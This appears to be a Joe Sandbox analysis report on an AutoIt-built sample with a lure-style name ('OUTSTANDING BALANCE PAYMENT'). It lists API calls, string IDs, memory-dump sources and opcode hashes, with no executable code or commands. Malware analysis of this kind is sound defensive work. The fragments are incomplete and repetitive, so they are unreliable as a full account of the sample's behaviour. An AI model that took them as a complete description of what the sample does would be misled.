                                                                  • Instruction ID: fd4c2877f6c60b09983682ff814f2e33aa8bdb91c91456820b83efe71bc8b324
                                                                  • Opcode Fuzzy Hash: a03bfce4cfc9edb49f07c97bab121b588885ec301b346f9645a18e5d04f8d74f
                                                                  • Instruction Fuzzy Hash: C3E04FB1111208EFEB025FB0DC5862E7BE8EB4C351F11C817FD5A87210CBB598409F40
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002BB2DF
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 002BB2EB
                                                                  • CloseHandle.KERNEL32(?), ref: 002BB2F4
                                                                  • CloseHandle.KERNEL32(?), ref: 002BB2FC
                                                                    • Part of subcall function 002BAB24: GetProcessHeap.KERNEL32(00000000,?,002BA848), ref: 002BAB2B
                                                                    • Part of subcall function 002BAB24: HeapFree.KERNEL32(00000000), ref: 002BAB32
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 002BDEAA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: AutoIt3GUI$Container
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcscpy
                                                                  • String ID: I//$I//
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 0029BCDA
                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0029BCF3
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  APIs
                                                                    • Part of subcall function 002844ED: __fread_nolock.LIBCMT ref: 0028450B
                                                                  • _wcscmp.LIBCMT ref: 002CC65D
                                                                  • _wcscmp.LIBCMT ref: 002CC670
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcscmp$__fread_nolock
                                                                  • String ID: FILE
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 002EA85A
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002EA86F
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 002E980E
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002E984A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C51C6
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002C5201
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: __snwprintf
                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002E945C
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002E9467
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • GetActiveWindow.USER32 ref: 002EDA7B
                                                                  • EnumChildWindows.USER32(?,002ED75F,00000000), ref: 002EDAF5
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$ActiveChildEnumLongWindows
                                                                  • String ID: T1-
                                                                  APIs
                                                                    • Part of subcall function 0029D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0029D1BA
                                                                    • Part of subcall function 0029D17C: GetStockObject.GDI32(00000011), ref: 0029D1CE
                                                                    • Part of subcall function 0029D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0029D1D8
                                                                  • GetWindowRect.USER32(00000000,?), ref: 002E9968
                                                                  • GetSysColor.USER32(00000012), ref: 002E9982
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                  • String ID: static
                                                                  • API String ID: 1983116058-2160076837
                                                                  • Opcode ID: 5884ae0c47ca6819db2d84583804d5ce76322a04f6954a138bf52ccd3e46d09e
                                                                  • Instruction ID: da8140adf86df0c6a3aa9b69f896189b2c1be51dda06b232bf6e1f430b34eeca
                                                                  • Opcode Fuzzy Hash: 5884ae0c47ca6819db2d84583804d5ce76322a04f6954a138bf52ccd3e46d09e
                                                                  • Instruction Fuzzy Hash: 4711377256020AAFDF05DFB8CC45AEA7BA8FB08344F014629FD55E3251E735E860DB60
                                                                  APIs
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 002E9699
                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002E96A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LengthMessageSendTextWindow
                                                                  • String ID: edit
                                                                  • API String ID: 2978978980-2167791130
                                                                  • Opcode ID: 6463896850c0cd419ae7b2fe5d29960247fe449484ce0f6a9699ab52491dff2a
                                                                  • Instruction ID: ef6a814fd048c85d402adc0d7bcc8af96c7bace13803598cbb2bfc5ff8a596c9
                                                                  • Opcode Fuzzy Hash: 6463896850c0cd419ae7b2fe5d29960247fe449484ce0f6a9699ab52491dff2a
                                                                  • Instruction Fuzzy Hash: C511BC71160149ABEF119FA5DC40EEB3B6EEB05378F900316F924971E0C771DCA09B60
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C52D5
                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002C52F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: 921c6ba7717dec901ca21baa76c5a452775a4691f82b2193f0af56c3eb0a5190
                                                                  • Instruction ID: b13fba5d7dcffffaff7365608ed3bfa8b2ca655891ebb619c1e6c7e71a669513
                                                                  • Opcode Fuzzy Hash: 921c6ba7717dec901ca21baa76c5a452775a4691f82b2193f0af56c3eb0a5190
                                                                  • Instruction Fuzzy Hash: 94110336E21A25ABDB11DE98C800F9D77E8AF46350F040259EC12E7190D7B0FD90CBD1
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002D4DF5
                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002D4E1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$OpenOption
                                                                  • String ID: <local>
                                                                  • API String ID: 942729171-4266983199
                                                                  • Opcode ID: 6e6b07c19c40e12e57fc0e13d61a62d4fdb8015f9f42fea18547432a74d16062
                                                                  • Instruction ID: 8fc6d8024f9a35ec8f593f27e7a5e85aeb94a1c082d7be0c65eb6f16f02dedd6
                                                                  • Opcode Fuzzy Hash: 6e6b07c19c40e12e57fc0e13d61a62d4fdb8015f9f42fea18547432a74d16062
                                                                  • Instruction Fuzzy Hash: 2511A070521222BBDB259F51C889EFBFBA9FF06754F10822BF50596280D3B05D60C6E0
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002B37A7
                                                                  • ___raise_securityfailure.LIBCMT ref: 002B388E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                  • String ID: (4
                                                                  • API String ID: 3761405300-1560626354
                                                                  • Opcode ID: 161e9f6253ef17beef684a4d2a78529316c94a5a19e3c88b694c55fc540def6a
                                                                  • Instruction ID: daa3dd6847a13a28ace8dd1eb39f6934b7785c88725dedcfe3c0315c7a74156f
                                                                  • Opcode Fuzzy Hash: 161e9f6253ef17beef684a4d2a78529316c94a5a19e3c88b694c55fc540def6a
                                                                  • Instruction Fuzzy Hash: DF212CB9610A04DAD70ADF65F9956407BB8BB4A310F10582AEB048F3A1DBF079E5CF45
                                                                  APIs
                                                                  • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 002DA84E
                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 002DA88B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: htonsinet_addr
                                                                  • String ID: 255.255.255.255
                                                                  • API String ID: 3832099526-2422070025
                                                                  • Opcode ID: a2b239d68154f56e0856a368773293691ee9a31576b25365d67aad94a3e09bce
                                                                  • Instruction ID: 5410f367d3af08c25766e0c29303a31c23ca4f29dc106245938fff21bf865dd7
                                                                  • Opcode Fuzzy Hash: a2b239d68154f56e0856a368773293691ee9a31576b25365d67aad94a3e09bce
                                                                  • Instruction Fuzzy Hash: F601D675210305ABCB119F64C896FA9B364FF44714F20852BF916973D1D771EC219B52
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002BB7EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: af2ac6c27d9b1e103d51ba532e6a5ebe16f5f3881aeacda3f7e3aec61af10f92
                                                                  • Instruction ID: a30f95a8b7286a61862edc02171e3540e1825d7458887e38e05920d1aa185354
                                                                  • Opcode Fuzzy Hash: af2ac6c27d9b1e103d51ba532e6a5ebe16f5f3881aeacda3f7e3aec61af10f92
                                                                  • Instruction Fuzzy Hash: E8012875621114ABCB05FFA4CC529FE73ADBF05394B54061DF461572C1EFB058288B60
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 002BB6EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: 26622441b133430a63cf647785ea08e4b08a2647a3ce8722c8ee0e991d380254
                                                                  • Instruction ID: 3ebf4b4356f668b07218b999fd4350a50d7e18ce77c66e600301bb3b2ca1f0f3
                                                                  • Opcode Fuzzy Hash: 26622441b133430a63cf647785ea08e4b08a2647a3ce8722c8ee0e991d380254
                                                                  • Instruction Fuzzy Hash: E301A7756610046BCB15FBA4C953AFF73AC9F05384F540019B502B32C1EFA05E288BB5
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 002BB76C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: 81e0fbae872f9ffbb23e265a2354fb389b6e6f1cb66110b948bf1a81b99e9b2f
                                                                  • Instruction ID: 9489ada3525f168304f485c889c9b5d56f019de47a53e4b23994e40a6eadcd23
                                                                  • Opcode Fuzzy Hash: 81e0fbae872f9ffbb23e265a2354fb389b6e6f1cb66110b948bf1a81b99e9b2f
                                                                  • Instruction Fuzzy Hash: 7E01DB76651104ABC705FBA4C952EFF73AC5F05384F640019B401731D1DFA05E299BB5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt
                                                                  • String ID: "4
                                                                  • API String ID: 3494438863-1647781385
                                                                  • Opcode ID: 8da7b3dbf7e9a45412013ebe38c9d1f4ac995e77cf6019993a880fc05e04033b
                                                                  • Instruction ID: 006b602fbebb7402718ddedcf202e36fef1efb7f017030e1e06b009da53d098b
                                                                  • Opcode Fuzzy Hash: 8da7b3dbf7e9a45412013ebe38c9d1f4ac995e77cf6019993a880fc05e04033b
                                                                  • Instruction Fuzzy Hash: 1CF0FC75229F029BE756AF29BC416676BD8FB47720F14091AF200DE185EFF0D8514F94
                                                                  APIs
                                                                  • LoadImageW.USER32(00280000,00000063,00000001,00000010,00000010,00000000), ref: 00284048
                                                                  • EnumResourceNamesW.KERNEL32(00000000,0000000E,002C67E9,00000063,00000000,76950280,?,?,00283EE1,?,?,000000FF), ref: 002F41B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: EnumImageLoadNamesResource
                                                                  • String ID: >(
                                                                  • API String ID: 1578290342-2420188955
                                                                  • Opcode ID: 99a588800d06d0e957f0de55dbad317025c8c43a268db7e851c52b649a5c19fc
                                                                  • Instruction ID: 2078d011783272474d4f8ce43aa2bde0628442cbb2723391a2ce125a3e465026
                                                                  • Opcode Fuzzy Hash: 99a588800d06d0e957f0de55dbad317025c8c43a268db7e851c52b649a5c19fc
                                                                  • Instruction Fuzzy Hash: 9FF06D39651715B7E2215B1ABC4AF933FADE706BB9F100506F614AE1D0D6E0A0D08B90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp
                                                                  • String ID: #32770
                                                                  • API String ID: 2292705959-463685578
                                                                  • Opcode ID: fe4e6af14d8af459a134a2fd15cfaaf72ab24c6725aeb405b82901a2a0b60370
                                                                  • Instruction ID: 0d308ba8e5474e67e3aaba0fbce8bbf8f3334c06fac42c7549be952e055c7c53
                                                                  • Opcode Fuzzy Hash: fe4e6af14d8af459a134a2fd15cfaaf72ab24c6725aeb405b82901a2a0b60370
                                                                  • Instruction Fuzzy Hash: 30E09277A042292BD711AAA5DC4AED7FBACEB51764F00011AF905E7081DA60A6158BD4
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002BA63F
                                                                    • Part of subcall function 002A13F1: _doexit.LIBCMT ref: 002A13FB
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: ccb3dcae1522715af577c2faa3aa03082ec605f28a553a4118f8173811a3dada
                                                                  • Instruction ID: 7a0dc3441d030bd279488d29fec57c177448dfa96c0240c232e434427ed162df
                                                                  • Opcode Fuzzy Hash: ccb3dcae1522715af577c2faa3aa03082ec605f28a553a4118f8173811a3dada
                                                                  • Instruction Fuzzy Hash: ACD05B313D532833D6153ADC7C17FC5764C8B15BA1F044056FB08995C24DD295B046D9
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 002FACC0
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002FAEBD
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                  • String ID: WIN_XPe
                                                                  • API String ID: 510247158-3257408948
                                                                  • Opcode ID: d0b74646137fd1c7b9910a49938d67b932ee230ad0ebd9d024d29e86031f96bc
                                                                  • Instruction ID: c42fd06deff3c776a2581901107345b6fb4c981ad5053c14811cd2925435ee56
                                                                  • Opcode Fuzzy Hash: d0b74646137fd1c7b9910a49938d67b932ee230ad0ebd9d024d29e86031f96bc
                                                                  • Instruction Fuzzy Hash: BAE039B0C201499FCB12DFA4D944AECF7BCAB48340F108093E256B2260CB705A94DF22
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002E86A2
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002E86B5
                                                                    • Part of subcall function 002C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7AD0
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: a5ad7c52bb0181f972f464960c21ed1f6ce8f27b8c6bb0d18fcef1350730241f
                                                                  • Instruction ID: a4e0149674eaee4264cb8fa740838161ecc207dcff481a2ae02c1864e909d792
                                                                  • Opcode Fuzzy Hash: a5ad7c52bb0181f972f464960c21ed1f6ce8f27b8c6bb0d18fcef1350730241f
                                                                  • Instruction Fuzzy Hash: 74D01231396318BBF36967B09C5FFC77A5C9B05B11F10091AF749AA1D0C9E1E950CB54
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002E86E2
                                                                  • PostMessageW.USER32(00000000), ref: 002E86E9
                                                                    • Part of subcall function 002C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7AD0
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 34ed4c8cd08ffb8b062ead68ce63930d76571efa395a8f4b158a78df0815e0cc
                                                                  • Instruction ID: 0cdf49e20505206e9c3c5f7511f45bcd23efce39e8b1e629fe82f4b6c89c3e85
                                                                  • Opcode Fuzzy Hash: 34ed4c8cd08ffb8b062ead68ce63930d76571efa395a8f4b158a78df0815e0cc
                                                                  • Instruction Fuzzy Hash: 6AD0C9313863186BF26A67B09C5BFC66A589B05B11F50091AB645AA1D0C9A1A9508A58